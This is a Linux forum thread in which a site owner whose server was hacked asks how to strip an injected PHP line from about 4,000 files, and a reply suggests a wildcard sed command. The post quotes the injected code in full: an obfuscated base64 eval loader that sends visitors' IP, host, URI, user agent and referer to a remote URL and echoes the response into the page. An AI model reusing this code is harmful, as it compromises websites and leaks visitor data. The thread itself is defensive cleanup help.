Review your favorite Linux distribution.
Go Back > Forums > Linux Forums > Linux - Newbie
User Name
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!


  Search this Thread
Old 10-24-2011, 05:14 PM   #1
LQ Newbie
Registered: Aug 2009
Posts: 2

Rep: Reputation: 0
Complex Find and Replace using sed or other tool

SUPER SORRY FOR THE LONG LINE.. I need to explain..

A server of mine was hacked recently and the hacker added a line of code to every .php file in my directory. There's about 4,000 files so I need some script to remove this malicious code below:

PHP Code:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip $_SERVER['REMOTE_ADDR'];$host$_SERVER['HTTP_HOST'];$uri urlencode($_SERVER['REQUEST_URI']);$ref urlencode($_SERVER['HTTP_REFERER']);$url $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref$tmp file_get_contents($url); echo $tmp?>

I want to find and replace it with NOTHING. I have tried sed, but with all these characters, it's not working for me.

I tried putting it in a variable also. No luck.

My Poor Attempt at a Bash Script

OLD="<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host= $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>"
[ ! -d $BPATH ] && mkdir -p $BPATH || :
for f in $DPATH
  if [ -f $f -a -r $f ]; then
    /bin/cp -f $f $BPATH
   sed "s/$OLD/$NEW/g" "$f" > $TFILE && mv $TFILE "$f"
   echo "Error: Cannot read $f"
/bin/rm -rf $TFILE
Old 10-24-2011, 05:42 PM   #2
Registered: Feb 2011
Distribution: Ubuntu 10.04, Debian Squeeze
Posts: 46

Rep: Reputation: 8
You don't need to type in the whole line to sed. Use a wildcard. Something like this should work:

sed -i 's/<?php $_F=__FILE__;.*//' *.php
Naturally, I would test it first.


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Similar Threads
Thread Thread Starter Forum Replies Last Post
Help with sed doing find and replace lostNspace Programming 2 08-25-2011 07:23 PM
find or replace without using sed adarshmca Linux - Newbie 9 12-28-2010 05:41 AM
find or replace through sed adarshmca Linux - Newbie 3 12-27-2010 11:35 PM
How to replace all occurances of a complex string using sed 6millionbucks Programming 6 08-12-2007 11:55 AM
sed - find and replace command bullshit Programming 9 01-05-2006 03:25 AM > Forums > Linux Forums > Linux - Newbie

All times are GMT -5. The time now is 04:47 AM.

Main Menu
Write for LQ is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration